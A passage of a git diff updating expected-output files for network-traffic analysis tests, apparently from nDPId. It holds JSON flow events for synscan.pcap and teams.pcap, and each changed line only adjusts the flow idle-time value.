{"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":2011,"packets-processed":2011,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":1876,"total-guessed-flows":116,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1994,"total-idle-flows":1994,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7990,"global_ts_msec":1278275079360} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2011/2011 
diff --git a/test/results/teams.pcap.out b/test/results/teams.pcap.out
index 731a900e3..f39472e52 100644
--- a/test/results/teams.pcap.out
+++ b/test/results/teams.pcap.out
@@ -5,15 +5,15 @@ 00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041672611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041672419,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041673094,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZ4MwAAAQEICjCEirAtAPMf"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587041673094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041673094,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZ4MwAAAQEICjCEirAtAPMf"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":4,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041673412} 
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041673611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":6,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041674611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041673094,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587041675216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041675216,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZv6wAAAQEICjCEkvgtAPMf"} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587041675216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041675216,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZv6wAAAQEICjCEkvgtAPMf"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":8,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041675409} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":9,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041675611} 
@@ -23,49 +23,49 @@ 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1587041676010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041676010,"pkt":"KDc3AG3IEBMx8Tl2CABFAABfTWlAADkRcM3AqAEBwKgBBgA17Y0ASwAAzp2BgAABAAEAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQABwAwAAQABAAAACQAENHJNIQ=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1587041676405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676405,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex0AbuczSMoSaIgqYAQEAmVMgAAAQEICjCEl5xhBkyo"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676435,"flow_last_seen":1587041676435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1587041676405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676405,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex0AbuczSMoSaIgqYAQEAmVMgAAAQEICjCEl5xhBkyo"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676435,"flow_last_seen":1587041676435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 